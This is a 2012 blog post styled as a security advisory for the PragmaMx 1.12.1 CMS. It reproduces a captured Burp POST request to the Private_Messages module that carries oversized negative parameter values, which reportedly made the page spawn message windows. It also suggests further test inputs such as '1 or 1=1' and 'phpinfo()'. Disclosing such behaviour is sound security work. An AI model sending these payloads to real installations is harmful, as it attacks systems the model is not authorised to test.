Sunday 18 March 2012

[EN] PragmaMx 1.12.1 - 'bomb' for logged-in users (in Private_Messages)

In latest PragmaMX I found interesting behavior. Described below:

# TITLE ....... # PragmaMx 1.12.1 - 'bomb' for logged-in users (in Private_Messages) ........ #
# DATE ........ # 18.03.2012 ................................................................................... #
# AUTOHR ...... # http://hauntit.blogspot.com .................................................................. #
# SOFT LINK ... # http://www.pragmamx.org ...................................................................... #
# VERSION ..... # 1.12.1 ....................................................................................... #
# TESTED ON ... # LAMP ......................................................................................... #
# .............................................................................................................. #

# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...

#............................................#
# 1. What is this?
This is very nice CMS, You should try it! ;)

#............................................#
# 2. What is the type of vulnerability?
When I was fuzzing this application I found very interesting thing.
Look at traffic from Burp at (3).

#............................................#
# 3. Where is bug :)

...cut from Burp...
POST /www/lastz/pragmamx.1.12.1/html/modules.php?name=Private_Messages HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:11.0) Gecko/20100101 Firefox/11.0
Referer: http://localhost/www/lastz/pragmamx.1.12.1/html/modules.php?name=Private_Messages&file=buddy&op=compose&to=tester
Cookie: mxlalala=lalala; tab_ya_edituser=1; PHPSESSID=PHPSESSID
Content-Type: application/x-www-form-urlencoded
Content-Length: 177
Connection: close

subject=aaaaa&message=aaaaaaaaaaaaaaaaa&name=Private_Messages&file=buddy&to_userid=-999999999999999&op=-999999999999999&to=-999999999999999&x=-999999999999999&y=-999999999999999
...cut from Burp...

What I saw at this stage You can check at my blog (4).
Description should be: after I build this payload (-999...) and send it to PragmaMx Via Burp,
response status was 200 (OK). So I copied url string and 'send it to browser'.
Page started to create new windows in messages (of other fuzzing tests).

'-999...' it's not 'only payload' to see this.
You can try many more, like: 23 or 1, 1 or 1=1, phpinfo(), etc.

Try it ;)

#............................................#
# 4. More...

- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net

#............................................#
# Best regards
#



No comments:

Post a Comment

What do You think...?